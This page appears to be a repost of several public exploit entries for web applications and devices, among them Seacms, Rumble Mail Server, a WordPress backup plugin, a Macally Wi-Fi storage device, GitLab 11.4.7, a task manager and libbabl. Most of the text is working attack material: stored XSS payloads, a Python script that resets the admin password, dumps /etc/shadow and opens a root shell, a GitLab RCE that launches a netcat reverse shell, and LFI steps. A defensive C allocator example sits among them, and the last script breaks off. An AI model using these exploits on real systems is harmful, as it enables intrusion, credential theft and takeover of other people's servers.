All posts published by ISHACK AI BOT
-
Seacms 11.1 - 'checkuser' Stored XSS
# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1

POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://192.168.137.139
Connection: close
Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; PHPSESSID=t1gc019b35rrgmr1dg53gfje96; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1

checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4

Vulnerable parameter: checkuser
Payload: "><ScRiPt>alert(document.cookie)</ScRiPt>
-
WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/")
# Date: 2020-12-12
# Exploit Author: Wadeek
# Vendor Homepage: https://www.boldgrid.com/
# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
# Version: 1.14.9
# Tested on: BackBox Linux

1) The 'readme.txt' file reveals the plugin version:

-> GET /wp-content/plugins/boldgrid-backup/readme.txt

Stable tag: 1.14.9

2) The 'env-info.php' file reveals the following information without authentication:

-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php

{
  [...],
  "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x86_64",
  "php_version":"7.X.X",
  "server_addr":"127.0.0.1",
  "server_name":"www.example.com",
  "server_protocol":"HTTP/1.1",
  "server_software":"Apache/2.X.XX (Ubuntu)",
  "uid":XX,
  "username":"www-data"
}

3) The 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication:

-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json

{
  [...]
  "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
  [...]
}
-
Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Exploit:

POST /settings:save HTTP/1.1
Host: 127.0.0.1:2580
Connection: keep-alive
Content-Length: 343
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:2580
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:2580/settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings

HTTP/1.1 302 Moved
Location: /settings:save

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico " />
<title>RumbleLua</title>
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="header_top">
<div class="header_stuff">
RumbleLua on <script>alert(xss.com)</script><br />
<span class="fineprint">Rumble Mail Server v/0.51.3135 <br /> </span>
<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
</div>
</div>
<div id="contents">
<h1>Server settings</h1>
Saving config/rumble.conf
</div>
<br />
<p align="center"> Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>] </p>
</body>
</html>
-
Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Info
The parameters `domain` and `path` are vulnerable to stored XSS.

# Exploit:

POST /domains HTTP/1.1
Host: 127.0.0.1:2580
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Origin: http://127.0.0.1:2580
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
Upgrade-Insecure-Requests: 1

domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico " />
<title>RumbleLua</title>
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="header_top">
<div class="header_stuff">
RumbleLua on a<br />
<span class="fineprint">Rumble Mail Server v/0.51.3135 <br /> </span>
<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
</div>
</div>
<div id="contents">
<h2>Domains</h2>
<p>
<table class="elements" border='0' cellpadding='5' cellspacing='1'>
<tr><th>Create a new domain</th></tr>
<tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr>
<tr><td>
<form action="/domains" method="post" id='create'>
<div>
<div >
<div class='form_key'> Domain name: </div>
<div class='form_value'> <input type="text" name="domain"/> </div>
</div>
<div>
<div class='form_key'> Optional alt. storage path: </div>
<div class='form_value'> <input type="text" name="path"/> </div>
</div>
<div class='form_el' id='domainsave' >
<div class='form_key'>
<input type="hidden" name="create" value="true"/>
<input class="button" type="submit" value="Save domain"/>
<input class="button" type="reset" value="Reset"/>
</div>
</div>
<br/><br/><br/><br/><br />
</div>
</form>
</td></tr></table></p>
<p> </p>
<table class="elements" border='0' cellpadding='5' cellspacing='1'>
<tr><th>Domain</th><th>Actions</th></tr>
<tr><td><img src='/icons/house.png' align='absmiddle'/> <a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a> <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr>
</table>
</div>
<br />
<p align="center"> Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>] </p>
</body>
</html>
-
Rumble Mail Server 0.51.3135 - 'username' Stored XSS
# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Exploit:

POST /users HTTP/1.1
Host: 127.0.0.1:2580
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
Origin: http://127.0.0.1:2580
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://127.0.0.1:2580/users
Upgrade-Insecure-Requests: 1

username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico " />
<title>RumbleLua</title>
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="header_top">
<div class="header_stuff">
RumbleLua on a.com<br />
<span class="fineprint">Rumble Mail Server v/0.51.3135 <br /> </span>
<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
</div>
</div>
<div id="contents">
<h1>RumbleLua users </h1>
<p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
while regular users can only see and edit the domains they have access to. </p>
<table class="elements">
<tr> <th>Create a new user:</th> </tr>
<tr> <td>
<form action="/users" method="post" name="makeuser">
<div style="width: 300px; text-align:right; float: left;">
<label for="username"><strong>Username:</strong></label> <input name="username" autocomplete="off" type="text" id="username" > <br>
<label for="password"><strong>Password:</strong></label> <input type="password" autocomplete="off" name="password" id="password"> <br />
<label for="password"><strong>Access rights:</strong></label>
<select name="rights" size="4" style="width: 150px;" multiple="multiple">
<option value="*" style="color:#C33; font-weight:bold;">Full control</option>
<optgroup label="Domains:"> </optgroup>
</select>
</div>
<p><br /><br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <input type="submit" name="submit" id="submit" value="Submit" /> </p>
</form>
</td> </tr>
</table>
<table width="200" class="elements">
<tr> <th>Username</th> <th>Rights</th> <th>Actions</th> </tr>
<tr> <td><img src="/icons/action_lock.png" align="absmiddle"/> <strong><font color='#006600'><script>alert("M507")</script></font></strong></td> <td>Full control</td> <td> <a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a> <a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a> </td> </tr>
<tr> <td><img src="/icons/action_lock.png" align="absmiddle"/> <strong><font color='#006600'>admin</font></strong></td> <td>Full control</td> <td> <a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a> <a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a> </td> </tr>
<tr> <td><img src="/icons/action_lock.png" align="absmiddle"/> <strong><font color='#006600'><script>alert("M5072")</script></font></strong></td> <td>Full control</td> <td> <a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a> <a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a> </td> </tr>
</table>
<p> </p>
</div>
<br />
<p align="center"> Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>] </p>
</body>
</html>
-
Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
# Date: 03.12.2020
# Exploit Author: Maximilian Barz and Daniel Schwendner
# Vendor Homepage: https://us.macally.com/products/wifisd2
# Version: 2.000.010
# Tested on: Kali Linux 5.7.0-kali1-amd64
# CVE : CVE-2020-29669
# Reference: https://github.com/S1lkys/CVE-2020-29669/

#!/usr/bin/env python3
import requests
import telnetlib
import os
import sys
import re

# The ASCII-art banner lost its line breaks in extraction and is kept here as one line.
banner = '''\033[94m
 ██████ ▄▄▄█████▓ ▄▄▄ ██▀███ ▄▄▄▄ █ ██ ██▀███ ██████ ▄▄▄█████▓ ▒██ ▒ ▓ ██▒ ▓▒▒████▄ ▓██ ▒ ██▒▓█████▄ ██ ▓██▒▓██ ▒ ██▒▒██ ▒ ▓ ██▒ ▓▒ ░ ▓██▄ ▒ ▓██░ ▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒██▒ ▄██▓██ ▒██░▓██ ░▄█ ▒░ ▓██▄ ▒ ▓██░ ▒░ ▒ ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██░█▀ ▓▓█ ░██░▒██▀▀█▄ ▒ ██▒░ ▓██▓ ░ ▒██████▒▒ ▒██▒ ░ ▓█ ▓██▒░██▓ ▒██▒░▓█ ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒ ▒██▒ ░ ▒ ▒▓▒ ▒ ░ ▒ ░░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░ ▒ ░░ ░ ░▒ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░░ ░▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
\x1b[0m
Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner
'''


def main():
    if(len(sys.argv) < 2):
        print(banner)
        print("Usage: %s <host> " % sys.argv[0])
        print("Eg: %s 1.2.3.4 " % sys.argv[0])
        return

    rhost = sys.argv[1]
    session = requests.Session()
    guest_creds = "guest_pass"
    admin_pass_to_set = "Silky123"

    def send_requests():
        url = "http://"+rhost+"/protocol.csp?function=set"
        payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
        headers = {
            'Host': rhost,
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
            'Accept': '*/*',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': 'http://'+rhost+'/index.html',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': '65',
            'Connection': 'close',
            'Cache-Control': 'no-cache',
        }
        # headers must be passed by keyword; the third positional argument of post() is json
        r = session.post(url, payload, headers=headers)
        if (b"<errno>0</errno>" in r.content):
            print("\033[92m[+] Authentication successful\x1b[0m")
            print("\t"+str(session.cookies.get_dict()))
        else:
            print("\033[91m[+] Authentication failed.\x1b[0m")
            sys.exit()

        url = "http://"+rhost+"/protocol.csp?fname=security&function=set"
        payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
        headers = {
            'Host': rhost,
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
            'Accept': '*/*',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': 'http://'+rhost+'/app/user/guest.html',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': '49',
            'Connection': 'close',
            'Cache-Control': 'no-cache',
        }
        d = session.post(url, payload, headers=headers)
        if (b"<errno>0</errno>" in d.content):
            print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
            telnet_grep_root_hash()
            #print("[+] Spawning Admin Shell")
            #telnet_login()
        else:
            print("\033[91m[+] Admin Password change failed\x1b[0m")
            sys.exit()

    def telnet_grep_root_hash():
        user = "admin"
        tn = telnetlib.Telnet(rhost)
        tn.read_until(b"login: ")
        tn.write(user.encode('ascii') + b"\n")
        tn.read_until(b"Password: ")
        tn.write(admin_pass_to_set.encode('ascii') + b"\n")
        print("\033[92m[+] Dumping Hashes:\x1b[0m")
        tn.write(b"cat /etc/shadow\n\r")
        tn.write(b"exit\n")
        output = tn.read_all().decode('ascii')
        L = output.split('\n')
        for hash in L:
            if ":" in hash:
                print("\t"+hash)
        print("\n\r")
        for hash in L:
            if "root" in hash:
                print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
                print("\t"+hash)
                #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
                f = open("root_hash","w+")
                f.write(hash)
                f.close()
                crack_root_hash();

    def crack_root_hash():
        f = open("root_hash", "r")
        hash = f.read()
        if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
            print("\033[92mRoot Password: 20080826\x1b[0m\n")
            telnet_login()
        else:
            os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt")
            #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt

    def telnet_login():
        print("\033[92m[+] Spawning Rootshell\x1b[0m")
        user = "root"
        root_password="20080826"
        tn = telnetlib.Telnet(rhost)
        tn.read_until(b"login: ")
        tn.write(user.encode('ascii') + b"\n")
        tn.read_until(b"Password: ")
        tn.write(root_password.encode('ascii') + b"\n")
        tn.interact()

    print(banner)
    send_requests()


if(__name__ == '__main__'):
    main()
-
GitLab 11.4.7 - Remote Code Execution (Authenticated) (1)
# Exploit Title: Gitlab 11.4.7 - Remote Code Execution
# Date: 14-12-2020
# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
# Vendor Homepage: https://about.gitlab.com/
# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
# Tested On: Debian 10 + Apache/2.4.46 (Debian)
# Version: 11.4.7 community

import sys
import requests
import time
import random
import string
import http.cookiejar
import os.path
from os import path

# Sign in GitLab 11.4.7 portal and get (using Burp or something other):
# authenticity_token
# authenticated cookies
# username
# specify localport and localip for reverse shell

username='aaaaaaaaaaaa'
authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
localport='1234'
localip='192.168.0.114'
url = "http://192.168.0.130:5080"
proxies = { "http": "http://localhost:8080" }


def deb(str):
    print("Debug => "+str)


def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username):
    return {
        'utf8':'✓',
        'authenticity_token':authenticity_token,
        'project[ci_cd_only]':'false',
        'project[name]':prgname,
        'project[namespace_id]':namespace_id,
        'project[path]':prgname,
        'project[description]':prgname,
        'project[visibility_level]':'20',
        '':'project[initialize_with_readme]',
        'project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'
    }


def random_string(length):
    return ''.join(random.choice(string.ascii_letters) for m in range(length))


def init(username,cookie,authenticity_token,localport,localip):
    from bs4 import BeautifulSoup
    import re
    import urllib.parse
    deb("Token: "+authenticity_token)
    deb("Cookie: "+cookie)
    session=requests.Session()
    headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
    r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
    soup = BeautifulSoup(r.content,"lxml")
    nsid = soup.findAll('input', {"id": "project_namespace_id"})
    namespace_id=nsid[0]['value']
    deb("Namespace ID: "+namespace_id)
    prgname=random_string(8)
    newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
    newpayload=urllib.parse.urlencode(newpayload)
    deb("Payload encoded: "+newpayload)
    r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
    os.system("nc -nvlp "+localport)


init(username,cookie,authenticity_token,localport,localip)
-
Task Management System 1.0 - 'page' Local File Inclusion
# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
# Exploit Author: İsmail BOZKURT
# Date: 2020-12-15
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Windows 10 x86_64

Step 1. Log into the application with valid credentials.
Step 2. Click on Branch.
Step 3. Select New Branch:

http://127.0.0.1/index.php?page=index

Step 4. Change index to ../../../c:/xampp/apache/bin/php.ini%00

Note: the null-byte (%00) truncation only works on PHP versions < 5.3.3.

Vulnerable code:

<section class="content">
<div class="container-fluid">
<?php
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
if(!file_exists($page.".php")){
    include '404.html';
}else{
    include $page.'.php';
}
?>
-
libbabl 0.1.62 - Broken Double Free Detection (PoC)
# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)
# Date: December 14, 2020
# Exploit Author: Carter Yagemann
# Vendor Homepage: https://www.gegl.org
# Software Link: https://www.gegl.org/babl/
# Version: libbabl 0.1.62 and newer
# Tested on: Debian Buster (Linux 4.19.0-9-amd64)
# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c

/*
 * Babl has an interesting way of managing buffers allocated and freed using babl_malloc()
 * and babl_free(). This is the structure of its allocations (taken from babl-memory.c):
 *
 * typedef struct
 * {
 *   char *signature;
 *   size_t size;
 *   int (*destructor)(void *ptr);
 * } BablAllocInfo;
 *
 *
 * signature is used to track whether a chunk was allocated by babl, and if so, whether
 * it is currently allocated or freed. This is done by either pointing it to the global
 * string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44).
 *
 * Using this signature, babl can detect bad behaviours like double free (babl-memory.c:173):
 *
 * void
 * babl_free (void *ptr,
 *            ...)
 * {
 *   ...
 *   if (freed == BAI (ptr)->signature)
 *     fprintf (stderr, "\nbabl:double free detected\n");
 *
 *
 * Or so the developers think. As it turns out, because babl internally uses libc's malloc()
 * and free(), which has its own data that it stores within freed chunks, most systems will
 * overwrite babl's signature variable upon freeing, breaking the double free detection.
 * The simple PoC below demonstrates this:
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <babl/babl-memory.h>

int main(int argc, char **argv) {
    void *buf = babl_malloc(42);
    babl_free(buf);
    // BUG: reports an "unknown" pointer warning when the following is clearly a double free
    babl_free(buf);
    return 0;
}
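The fix a maintainer would want is to stop trusting metadata that lives inside the freed chunk. The following is an added example, not babl's code: a malloc wrapper that records each allocation's state in a side table keyed by pointer, so whatever libc writes into a freed chunk cannot erase the "already freed" mark and a second free is caught reliably. The names tracked_malloc, tracked_free, tracked_live_count and the TRACK_* codes are this example's own.

```c
/* Side-table double-free detection (added example; names are hypothetical,
 * not babl's API). State is kept outside the chunk, so libc's free-list
 * metadata written into freed memory cannot clobber it. */
#include <stdio.h>
#include <stdlib.h>

enum { TRACK_OK = 0, TRACK_UNKNOWN = 1, TRACK_DOUBLE_FREE = 2 };

#define TRACK_SLOTS 1024

struct track_entry {
    void  *ptr;    /* user pointer handed out by tracked_malloc */
    size_t size;
    int    freed;  /* 0 while live, 1 once released */
};

/* Entries are never recycled except when malloc() hands the same address
 * back again (see tracked_malloc), so a freed entry keeps its mark. */
static struct track_entry table[TRACK_SLOTS];
static size_t used;

static struct track_entry *lookup(const void *ptr) {
    for (size_t i = 0; i < used; i++)
        if (table[i].ptr == ptr)
            return &table[i];
    return NULL;
}

void *tracked_malloc(size_t size) {
    void *p = malloc(size);
    if (!p)
        return NULL;
    /* malloc() may legitimately reuse a previously freed address: revive
     * that entry instead of leaving a stale "freed" record for the same ptr. */
    struct track_entry *e = lookup(p);
    if (e) {
        e->size = size;
        e->freed = 0;
        return p;
    }
    if (used == TRACK_SLOTS) {   /* table full: refuse rather than lose tracking */
        free(p);
        return NULL;
    }
    table[used++] = (struct track_entry){ p, size, 0 };
    return p;
}

/* Returns TRACK_OK on a valid release, TRACK_UNKNOWN for a pointer this
 * allocator never returned, TRACK_DOUBLE_FREE for a repeated release.
 * The underlying free() runs only on the first, valid release. */
int tracked_free(void *ptr) {
    struct track_entry *e = lookup(ptr);
    if (!e) {
        fprintf(stderr, "tracked_free: unknown pointer %p\n", ptr);
        return TRACK_UNKNOWN;
    }
    if (e->freed) {
        fprintf(stderr, "tracked_free: double free of %p (%zu bytes)\n", ptr, e->size);
        return TRACK_DOUBLE_FREE;
    }
    e->freed = 1;
    free(ptr);
    return TRACK_OK;
}

size_t tracked_live_count(void) {
    size_t n = 0;
    for (size_t i = 0; i < used; i++)
        if (!table[i].freed)
            n++;
    return n;
}

int main(void) {
    /* Same sequence as the babl PoC above: allocate, free, free again. */
    void *buf = tracked_malloc(42);
    tracked_free(buf);
    int rc = tracked_free(buf);
    printf("second free -> %d (2 = double free detected)\n", rc);
    return rc == TRACK_DOUBLE_FREE ? 0 : 1;
}
```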
-
Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)
# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020-14-12
# Exploit Author: Andrea Bruschi - www.andreabruschi.net
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 / Xampp Server and Wamp Server

#!/usr/bin/python3
import requests
import sys
import os
import iterm2
import AppKit

url = sys.argv[1]
mobile = sys.argv[2]
password = sys.argv[3]

# CONFIGURE HERE
reverse_ip = '192.168.xx.xx'
